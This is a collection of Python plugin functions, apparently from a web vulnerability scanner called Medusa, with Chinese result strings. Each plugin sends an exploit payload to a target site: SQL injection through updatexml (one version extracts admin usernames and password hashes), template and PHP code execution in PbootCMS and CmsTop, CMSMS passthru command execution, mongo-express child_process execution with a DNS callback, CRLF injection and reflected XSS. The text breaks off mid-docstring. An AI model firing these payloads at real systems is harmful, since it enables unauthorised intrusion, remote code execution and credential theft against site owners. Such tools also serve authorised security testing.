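        _ = VulnerabilityInfo('').info.get('algroup')
        # Log the URL together with the name of the failing plugin.
        ClassCongregation.ErrorLog().Write(url, _)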
def medusa(Url, RandomAgent, Token, proxies=None):
    """Check whether /install/phpinfo.php is exposed on the target.

    A finding is recorded when the response is a 200 whose body contains
    four phpinfo() markers.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        Token: Passed through to VulnerabilityDetails with the finding.
        proxies: Proxy setting, normalised by ClassCongregation.Proxies.

    Returns:
        None. Findings and errors are handed to the ClassCongregation writers.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload_url = "".join(
            [scheme, "://", url, ":", str(port), "/install/phpinfo.php"])
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        session = requests.session()
        # verify=False: TLS certificate validation is disabled for the probe.
        response = session.get(payload_url,
                               headers=request_headers,
                               timeout=6,
                               proxies=proxies,
                               verify=False)
        page = response.text
        expected = ('System', 'Configure Command', 'PHP', 'IPv6 Support')
        if response.status_code == 200 and all(text in page for text in expected):
            Medusa = "{}存在php探针漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, page)
            finding = VulnerabilityInfo(Medusa)
            # Pass the url and the scan result to the details writer.
            ClassCongregation.VulnerabilityDetails(
                finding.info, url, Token).Write()
            # Write to file: url is the target file name, Medusa the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Log the URL together with the name of the failing plugin.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url, RandomAgent, Token, proxies=None):
    """POST a crafted message form and look for the SQL error page it triggers.

    A finding is recorded when the response is a 200 whose body contains the
    two error-page captions and the injected column list echoed back.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        Token: Passed through to VulnerabilityDetails with the finding.
        proxies: Proxy setting, normalised by ClassCongregation.Proxies.

    Returns:
        None. Findings and errors are handed to the ClassCongregation writers.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        path = "/index.php/Message/add"
        form_body = "contacts[content`,`create_time`,`update_time`) VALUES ('1', '1' ,1 and updatexml(1,concat(0x3a,user()),1) );-- a] = 11231231313&mobile=2&content=3"
        payload_url = "".join([scheme, "://", url, ":", str(port), path])
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        # verify=False: TLS certificate validation is disabled for the probe.
        response = requests.post(payload_url,
                                 headers=request_headers,
                                 timeout=6,
                                 data=form_body,
                                 proxies=proxies,
                                 verify=False)
        page = response.text
        # All three fragments must be present in the error page.
        evidence = (
            '错误信息',
            '''(`content`,`create_time`,`update_time`) VALUES ('1', '1' ,1 and updatexml(1,concat(0x3a,user()),1) )''',
            '执行SQL发生错误',
        )
        if response.status_code == 200 and all(part in page for part in evidence):
            Medusa = "{} 存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(
                url, payload_url, page)
            finding = VulnerabilityInfo(Medusa)
            # Pass the url and the scan result to the details writer.
            ClassCongregation.VulnerabilityDetails(
                finding.info, url, Token).Write()
            # Write to file: url is the target file name, Medusa the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Log the URL together with the name of the failing plugin.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
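def Main(Url, FileName, Values, ProxyIp):
    """Run the three Jenkins plugin checks and write each result to FileName.

    Args:
        Url: Target URL handed to each plugin.
        FileName: Name passed to ClassCongregation.WriteFile.
        Values: User-supplied browser header choice for UserAgentS.
        ProxyIp: Proxy argument handed to each plugin.

    Returns:
        None.
    """
    # The WriteFile instance must be created with the file name first.
    WriteFile = ClassCongregation.WriteFile(FileName)
    # Build the User-Agent from the header the user selected.
    ua = ClassCongregation.UserAgentS(Values)
    RandomAgent = ua.UserAgent()
    # The plugins run here, while the list is built and outside the try
    # block. The progress bar below therefore tracks writing, not scanning.
    Medusa = [
        JenkinsArbitraryFileReadVulnerability.medusa(Url, RandomAgent,
                                                     ProxyIp),
        JenkinsRemoteCommandExecutionVulnerability.medusa(
            Url, RandomAgent, ProxyIp),
        JenkinsConfigurationErrorCausesUnauthorizedCodeExecutionVulnerability.
        medusa(Url, RandomAgent, ProxyIp)
    ]
    try:
        for i in tqdm(Medusa, ascii=True, desc="Jenkins plugin progress"):
            WriteFile.Write(str(i))
    except Exception:
        # Best effort: a failed write ends the loop quietly. `Exception`
        # rather than a bare except, so Ctrl-C and SystemExit still work.
        pass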
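def Main(Url, FileName, Values, ProxyIp):
    """Run both Umail plugin checks against Url and write each result.

    Args:
        Url: Target URL handed to each plugin.
        FileName: Name passed to ClassCongregation.WriteFile.
        Values: User-supplied browser header choice for UserAgentS.
        ProxyIp: Proxy argument handed to each plugin.

    Returns:
        None.
    """
    # The WriteFile instance must be created with the file name first.
    WriteFile = ClassCongregation.WriteFile(FileName)
    # Build the User-Agent from the header the user selected.
    ua = ClassCongregation.UserAgentS(Values)
    RandomAgent = ua.UserAgent()
    for plugin_name in ("Umail_sessionid_access", "Umail_physical_path"):
        try:
            # Resolved inside the try so a missing plugin module is skipped
            # the same way a failing one is.
            plugin = getattr(Cms.Umail, plugin_name)
            Medusa = plugin.medusa(Url, RandomAgent, ProxyIp)
            WriteFile.Write(Medusa)
        except Exception:
            # Best effort: one failing plugin must not stop the other.
            # `Exception` rather than a bare except, so Ctrl-C and SystemExit
            # still end the scan.
            pass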
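def Main(Url, FileName, Values, ProxyIp):
    """Run both Joomla plugin checks against Url and write each result.

    Args:
        Url: Target URL handed to each plugin.
        FileName: Name passed to ClassCongregation.WriteFile.
        Values: User-supplied browser header choice for UserAgentS.
        ProxyIp: Proxy argument handed to each plugin.

    Returns:
        None.
    """
    # The WriteFile instance must be created with the file name first.
    WriteFile = ClassCongregation.WriteFile(FileName)
    # Build the User-Agent from the header the user selected.
    ua = ClassCongregation.UserAgentS(Values)
    RandomAgent = ua.UserAgent()
    for plugin_name in ("Joomla_com_docman_lfi", "Joomla_index_list_sqli"):
        try:
            # Resolved inside the try so a missing plugin module is skipped
            # the same way a failing one is.
            plugin = getattr(Cms.Joomla, plugin_name)
            Medusa = plugin.medusa(Url, RandomAgent, ProxyIp)
            WriteFile.Write(Medusa)
        except Exception:
            # Best effort: one failing plugin must not stop the other.
            # `Exception` rather than a bare except, so Ctrl-C and SystemExit
            # still end the scan.
            pass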
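def Main(Url, FileName, Values, ProxyIp):
    """Run both Metinfo plugin checks against Url and write each result.

    Args:
        Url: Target URL handed to each plugin.
        FileName: Name passed to ClassCongregation.WriteFile.
        Values: User-supplied browser header choice for UserAgentS.
        ProxyIp: Proxy argument handed to each plugin.

    Returns:
        None.
    """
    # The WriteFile instance must be created with the file name first.
    WriteFile = ClassCongregation.WriteFile(FileName)
    # Build the User-Agent from the header the user selected.
    ua = ClassCongregation.UserAgentS(Values)
    RandomAgent = ua.UserAgent()
    for plugin_name in ("Metinfo_login_check_sqli",
                        "Metinfo_getpassword_sqli"):
        try:
            # Resolved inside the try so a missing plugin module is skipped
            # the same way a failing one is.
            plugin = getattr(Cms.Metinfo, plugin_name)
            Medusa = plugin.medusa(Url, RandomAgent, ProxyIp)
            WriteFile.Write(Medusa)
        except Exception:
            # Best effort: one failing plugin must not stop the other.
            # `Exception` rather than a bare except, so Ctrl-C and SystemExit
            # still end the scan.
            pass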
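def Main(Url, FileName, Values, ProxyIp):
    """Run both Opensns plugin checks against Url and write each result.

    Args:
        Url: Target URL handed to each plugin.
        FileName: Name passed to ClassCongregation.WriteFile.
        Values: User-supplied browser header choice for UserAgentS.
        ProxyIp: Proxy argument handed to each plugin.

    Returns:
        None.
    """
    # The WriteFile instance must be created with the file name first.
    WriteFile = ClassCongregation.WriteFile(FileName)
    # Build the User-Agent from the header the user selected.
    ua = ClassCongregation.UserAgentS(Values)
    RandomAgent = ua.UserAgent()
    for plugin_name in ("Opensns_index_getshell", "Opensns_index_arearank"):
        try:
            # Resolved inside the try so a missing plugin module is skipped
            # the same way a failing one is.
            plugin = getattr(Cms.Opensns, plugin_name)
            Medusa = plugin.medusa(Url, RandomAgent, ProxyIp)
            WriteFile.Write(Medusa)
        except Exception:
            # Best effort: one failing plugin must not stop the other.
            # `Exception` rather than a bare except, so Ctrl-C and SystemExit
            # still end the scan.
            pass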
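def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Request a PbootCMS search URL with urllib and look for phpinfo() output.

    A finding is recorded when the response is a 200 whose body contains
    four phpinfo() headings.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        proxies: Normalised by ClassCongregation.Proxies, but not applied to
            the urllib request made here.
        **kwargs: Passed through to VulnerabilityDetails with the finding.

    Returns:
        None. Findings and errors are handed to the ClassCongregation writers.
    """
    # NOTE(review): the proxy setting is computed but urlopen below does not
    # use it, so this plugin connects directly even when a proxy is set.
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/index.php/index/index?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        header = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        req = request.Request(
            payload_url,
            headers=header,
        )
        # urlopen has no default timeout, so an unresponsive target could
        # block the scan indefinitely. 6 seconds matches the timeout the
        # requests-based plugins use.
        response = request.urlopen(req, timeout=6)
        # If decoding fails, remove gzip from the Accept-Encoding header:
        # urllib does not decompress the body on its own.
        con = response.read().decode('utf8')
        code = response.getcode()
        markers = ('System', 'Build Date', 'Compiler', 'PHP Version')
        if code == 200 and all(marker in con for marker in markers):
            Medusa = "{} 存在PbootCMS命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Pass the url and the scan result to the details writer.
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()
            # Write to file: url is the target file name, Medusa the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Hand the plugin name, target and exception to the error log writer.
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)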
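def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Request the module's CRLF test path and check for an injected cookie.

    The request path (`Payload`) is a name defined outside this function.
    A finding is recorded when the response is a 302 whose Set-Cookie header
    contains "a=1".

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        proxies: Proxy setting, normalised by ClassCongregation.Proxies.
        **kwargs: Passed through to VulnerabilityDetails with the finding.

    Returns:
        None. Findings and errors are handed to the ClassCongregation writers.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    PayloadUrl = scheme + "://" + url + ':' + str(port) + Payload
    host = url + ':' + str(port)
    headers = {
        'Host': host,
        'Accept-Encoding': 'gzip, deflate',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'User-Agent': RandomAgent,
        'Connection': 'close',
    }
    try:
        # Redirects are not followed: the 302 response itself is inspected.
        resp = requests.get(PayloadUrl,
                            headers=headers,
                            timeout=5,
                            proxies=proxies,
                            allow_redirects=False)
        # An ordinary redirect carries no Set-Cookie header. `.get` returned
        # None there and `.lower()` then raised, logging a plugin error for a
        # target that is simply not affected.
        con = resp.headers.get('Set-Cookie') or ''
        code = resp.status_code
        if code == 302 and 'a=1' in con.lower():
            Medusa = "{} 存在Nginx_CRLF注入漏洞\r\n漏洞详情:\r\nPayload:{}\r\n".format(
                url, PayloadUrl)
            _t = VulnerabilityInfo(Medusa)
            # Pass the url and the scan result to the details writer.
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()
            # Write to file: url is the target file name, Medusa the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Hand the plugin name, target and exception to the error log writer.
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)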
def medusa(Url, RandomAgent, UnixTimestamp):
    """POST a crafted delete request to /main.php and look for a fixed hash.

    A finding is recorded when the response is a 200 whose body contains the
    32-character hex marker the request is expected to produce.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        UnixTimestamp: Passed through to VulnerabilityDetails with the finding.

    Returns:
        None. Findings and errors are handed to the ClassCongregation writers.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        path = '/main.php?m=company&s=admin/business_info_list'
        payload_url = "".join([scheme, "://", url, ":", str(port), path])
        form_body = "del[]=1) or updatexml(2,concat(0x7e,((select group_concat(user,0x5e,md5(c)) from hy_admin))),0) %23&updateID=11&cc=6750"
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }
        session = requests.session()
        # verify=False: TLS certificate validation is disabled for the probe.
        response = session.post(payload_url,
                                data=form_body,
                                headers=request_headers,
                                timeout=6,
                                verify=False)
        page = response.text
        if (response.status_code == 200
                and "4a8a08f09d37b73795649038408b5f33" in page):
            Medusa = "{}存在B2BbuilderSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\nPost数据:{}\r\n返回内容:{}\r\n".format(
                url, payload_url, form_body, page)
            finding = VulnerabilityInfo(Medusa)
            # Pass the url and the scan result to the details writer.
            ClassCongregation.VulnerabilityDetails(
                finding.info, url, UnixTimestamp).Write()
            # Write to file: url is the target file name, Medusa the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Log the URL together with the name of the failing plugin.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(**kwargs) -> None:
    """POST a crafted ``formids`` value to WorkflowCenterTreeData.jsp.

    Reads "Url", "Headers" and "Proxies" from kwargs. A finding is recorded
    when the response is a 200 whose lower-cased body contains the four JSON
    keys of a tree-node listing.

    Note that the Headers dict supplied by the caller is modified in place.
    """
    url = kwargs.get("Url")  # target url supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy setting supplied by the caller
    try:
        payload_url = url + "/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333"
        Headers['Content-Type'] = 'application/x-www-form-urlencoded'
        Headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        # Built once and reused for both the request and the report.
        formids = ('11111111111)))' + '\x0a\x0d' * 360 +
                   'union select NULL,instance_name from '
                   'v$instance order by (((1')
        session = requests.session()
        # verify=False: TLS certificate validation is disabled for the probe.
        resp = session.post(payload_url,
                            data={'formids': formids},
                            headers=Headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        lowered = resp.text.lower()
        json_keys = ('''"draggable":''', '''"checked":''', '''"id":''',
                     '''"text":''')
        if resp.status_code == 200 and all(key in lowered for key in json_keys):
            Medusa = "{}存在泛微OA_WorkflowCenterTreeData接口注入漏洞\r\n 验证数据:\r\nUrl:{}\r\nPayload:{}\r\n".format(
                url, payload_url, formids)
            finding = VulnerabilityInfo(Medusa)
            # The response object, not the url, goes to the details writer here.
            ClassCongregation.VulnerabilityDetails(
                finding.info, resp, **kwargs).Write()
            # Write to file: url is the target file name, Medusa the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Hand the plugin name, target and exception to the error log writer.
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + plugin_name + " || Target Url:" + url, e)
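def medusa(Url, RandomAgent, ProxyIp):
    """Request two CmsTop search URLs and look for phpinfo() output.

    Args:
        Url: Target URL; split by ClassCongregation.UrlProcessing().result.
        RandomAgent: Value sent as the User-Agent header.
        ProxyIp: Accepted for interface compatibility; not used by the request.

    Returns:
        The finding texts joined with newlines when at least one URL matched,
        otherwise None.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    payload = "/app/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}"
    payloadurl = scheme + "://" + url + ":" + str(port) + payload
    payload2 = "/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}"
    domain_name = ".".join(url.split(".")[1:])
    # NOTE(review): "app" and domain_name are joined without a dot, and the
    # resulting host differs from the one the operator supplied - confirm
    # both the intended host name and that it is inside the scan scope.
    payloadurl2 = scheme + "://app" + domain_name + ":" + str(port) + payload2
    Payloads = [payloadurl, payloadurl2]
    Medusas = []  # collects the findings that are returned
    headers = {
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    for payload_url in Payloads:
        try:
            s = requests.session()
            # verify=False: TLS certificate validation is disabled for the probe.
            resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
            con = resp.text
            code = resp.status_code
            if code == 200 and 'PHP Version' in con and 'Configure Command' in con:
                Medusa = "{}存在CmsTop远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
                _t = VulnerabilityInfo(Medusa)
                web = ClassCongregation.VulnerabilityDetails(_t.info)
                # Severity levels: serious, High, Intermediate, Low.
                web.High()
                # Write to file: url is the target file name, Medusa the result.
                ClassCongregation.WriteFile().result(str(url), str(Medusa))
                # The list was never filled before, so the return below was
                # unreachable and callers always received None.
                Medusas.append(Medusa)
        except Exception:
            _ = VulnerabilityInfo('').info.get('algroup')
            # Log the URL together with the name of the failing plugin.
            ClassCongregation.ErrorLog().Write(url, _)
    if Medusas:
        return "".join(finding + "\n" for finding in Medusas)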
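def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check a CraftedWeb install for reflected XSS in notice.php.

    A random token is embedded in an ``<img ... onerror=...>`` fragment placed
    in the ``e`` query parameter. A finding is recorded when the response is
    HTTP 200 and the body contains that exact fragment unencoded.

    Args:
        Url: Target URL, split into scheme, host and port by the project helper.
        RandomAgent: Value sent as the User-Agent header.
        proxies: Proxy setting, normalised by ``ClassCongregation.Proxies``.
        **kwargs: Forwarded unchanged to ``VulnerabilityDetails``.

    Returns:
        None. Findings and errors are written through the project's helpers;
        exceptions are caught and logged.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        # Random token so a match can only come from this request.
        RD = ClassCongregation.randoms().result(20)
        marker = "<img src=x onerror=alert('{}')>".format(RD)
        payload = "/aasp_includes/pages/notice.php?e=1" + marker
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        # verify=False: the server certificate is not validated.
        resp = requests.get(payload_url,
                            headers=headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        con = resp.text
        # Compare against the markup that was actually sent. The earlier check
        # searched for a <script> form that this request never contains, so a
        # reflection of the payload could not be recognised. An HTML-encoded
        # reflection does not match, which is the desired outcome.
        if resp.status_code == 200 and marker in con:
            Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Store the finding for this URL.
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()
            # Write the result to a file named after the target URL.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Log the URL together with the name of the failing plugin.
        ClassCongregation.ErrorLog().Write(url, plugin_name)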
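def medusa(Url, RandomAgent, UnixTimestamp):
    """Check a 74CMS site for boolean-based SQL injection in wap-company-show.php.

    Two GET requests are sent whose ``id`` parameter differs only in the value
    an appended condition is compared with. A finding is recorded when both
    responses are HTTP 200 and the page marker appears for the first condition
    but not for the second.

    Args:
        Url: Target URL, split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the User-Agent header.
        UnixTimestamp: Passed through to ``VulnerabilityDetails``.

    Returns:
        None. Findings and errors are written through the project's helpers;
        exceptions are caught and logged.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        # NOTE(review): the pair assumes the first hex digit of md5(0x11) has
        # ASCII code 52, making the first condition true and the second
        # false — confirm.
        true_payload = "/wap/wap-company-show.php?id=1%20and%20ascii(substring((md5(0x11)),1,1))=52"
        false_payload = "/wap/wap-company-show.php?id=1%20and%20ascii(substring((md5(0x11)),1,1))=53"
        base = scheme + "://" + url + ":" + str(port)
        payload_url = base + true_payload
        payload_url2 = base + false_payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        # verify=False: the server certificate is not validated.
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        resp2 = s.get(payload_url2, headers=headers, timeout=6, verify=False)
        con = resp.text
        con2 = resp2.text
        marker = 'url="wap-jobs-show.php?id=1"'
        both_ok = resp.status_code == 200 and resp2.status_code == 200
        # The evidence is the difference between the two responses. Requiring
        # the marker in both, as before, reported every host that ignores the
        # appended condition, which is the non-vulnerable case.
        if both_ok and marker in con and marker not in con2:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Store the finding for this URL.
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()
            # Write the result to a file named after the target URL.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Log the URL together with the name of the failing plugin.
        ClassCongregation.ErrorLog().Write(url, plugin_name)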
def medusa(Url, RandomAgent, UnixTimestamp):
    """Check a CMSMS site for command execution through editusertag.php.

    One POST is sent to the admin user-tag editor with a fixed form body. A
    finding is recorded when the response body contains the JSON fragment
    tested below; the HTTP status code is not part of the condition.

    Args:
        Url: Target URL, split into scheme, host and port by the project helper.
        RandomAgent: Value sent as the User-Agent header.
        UnixTimestamp: Passed through to ``VulnerabilityDetails``.

    Returns:
        None. Findings and errors are written through the project's helpers;
        exceptions are caught and logged.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        # Default port by scheme; stays None for any other scheme.
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        # NOTE(review): the _sk_ value is fixed in both the path and the body;
        # presumably it is a session-bound key, in which case the check only
        # works against a session that happens to use it — confirm.
        payload = "/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4"
        data = "_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1"
        payload_url = "{}://{}:{}{}".format(scheme, url, str(port), payload)
        # NOTE(review): Content-Length is fixed at 115 here; requests normally
        # derives it from the body — confirm the fixed value is not sent as-is.
        headers = {
            'User-Agent': RandomAgent,
            "Accept": "*/*",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",
            "Content-Length": "115",
            "Connection": "close",
            "Pragma": "no-cache",
            "Cache-Control": "no-cache"
        }
        session = requests.session()
        # verify=False: the server certificate is not validated.
        resp = session.post(payload_url,
                            data=data,
                            headers=headers,
                            timeout=6,
                            verify=False)
        con = resp.text
        if '{"response":"Success","details":"}' in con:
            Medusa = "{}存在CMSMS任意命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Store the finding for this URL.
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()
            # Write the result to a file named after the target URL.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Log the URL together with the name of the failing plugin.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url, RandomAgent, UnixTimestamp):
    """Check a mongo-express instance for code execution via /checkValid.

    One POST is sent whose ``document`` field asks the server to ping a host
    name obtained from the project's ``Dnslog`` helper. After a fixed
    10-second wait, a finding is recorded when ``Dnslog.result()`` is truthy.

    Args:
        Url: Target URL, split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the User-Agent header.
        UnixTimestamp: Passed through to ``VulnerabilityDetails``.

    Returns:
        None. Exceptions are caught and only the plugin name is logged; the
        exception itself is not recorded.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Default port by scheme; stays None for any other scheme.
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        payload = "/checkValid"
        payload_url = "{}://{}:{}{}".format(scheme, url, str(port), payload)
        dns = Dnslog()
        callback_host = dns.dns_host()
        data = 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping {}")'.format(
            callback_host)
        # The Authorization value is a fixed Basic credential (admin:pass), so
        # the request presumably only succeeds where that credential is still
        # in place. NOTE(review): Content-Length is fixed at 123; requests
        # normally derives it from the body — confirm.
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Authorization': 'Basic YWRtaW46cGFzcw==',
            'Connection': 'close',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Content-Length': '123'
        }
        session = requests.session()
        # verify=False: the server certificate is not validated. The response
        # is ignored; the evidence is the DNS lookup checked below.
        session.post(payload_url,
                     data=data,
                     headers=headers,
                     timeout=6,
                     verify=False)
        # Fixed wait before the callback record is checked.
        time.sleep(10)
        if dns.result():
            Medusa = "{} 存在mongo-express远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\npayload:{}".format(
                url, payload_url, data)
            _t = VulnerabilityInfo(Medusa)
            # Store the finding for this URL.
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()
            # Write the result to a file named after the target URL.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        # Log the URL together with the name of the failing plugin.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url, RandomAgent, Token, proxies=None):
    """Check a 五车 library-management system for directory listing via kindaction.action.

    One POST is sent with ``subkind`` set to a Windows system directory. A
    finding is recorded when the response is HTTP 200 and its body contains
    the text 'system.ini'.

    Args:
        Url: Target URL, split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the User-Agent header.
        Token: Passed through to ``VulnerabilityDetails``.
        proxies: Proxy setting, normalised by ``ClassCongregation.Proxies``.

    Returns:
        None. Findings and errors are written through the project's helpers;
